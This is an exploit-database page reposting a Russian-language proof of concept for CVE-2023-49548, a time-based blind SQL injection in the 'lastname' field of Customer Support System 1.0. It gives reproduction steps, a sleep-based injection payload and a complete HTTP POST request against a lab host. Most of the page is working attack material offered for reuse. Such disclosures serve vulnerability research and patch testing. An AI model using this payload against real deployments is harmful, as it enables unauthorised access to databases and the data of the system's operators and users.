Sploitus

Exploit for CVE-2023-49548

kitploit · 2026-08-31

Exploit Code

MARKDOWN43 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GERALDOALCANTARA-CVE-2023-49548
# CVE-2023-49548

# Customer Support System 1.0 - Уязвимость SQL-инъекции в параметре «lastname» при операции «save_user»

**Описание** : В версии 1 Customer Support System существует уязвимость SQL-инъекции. Злоумышленник может выполнять SQL-команды к базе данных MySQL при создании/редактировании пользователя через уязвимый параметр «lastname».

**Уязвимая версия продукта** : Customer Support System 1.0  
**Автор CVE** : Geraldo Alcântara  
**Дата** : 28/11/2023  
**Подтверждено** : 19/12/2023  
**CVE** : CVE-2023-49548  
**Протестировано на** : Windows

### Шаги для воспроизведения:

  1. Войдите в приложение.
  2. Нажмите на изображение своего пользователя и выберите «Manage Account».
  3. Вставьте вредоносную нагрузку в параметр «lastname».  
**нагрузка** : '%20and%20(select*from(select(sleep(20)))a)--%20



### Запрос:

root@kitploit:~
    
    
    POST /customer_support/ajax.php?action=save_user HTTP/1.1
    Host: 192.168.68.182
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
    Accept: */*
    Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 144
    Origin: http://192.168.68.182
    Connection: close
    Referer: http://192.168.68.182/customer_support/index.php?page=department_list
    Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
    
    id=1&table=users&firstname=Administrator&middlename=teste&lastname='%20and%20(select*from(select(sleep(5)))a)--%20&username=admin&password=admin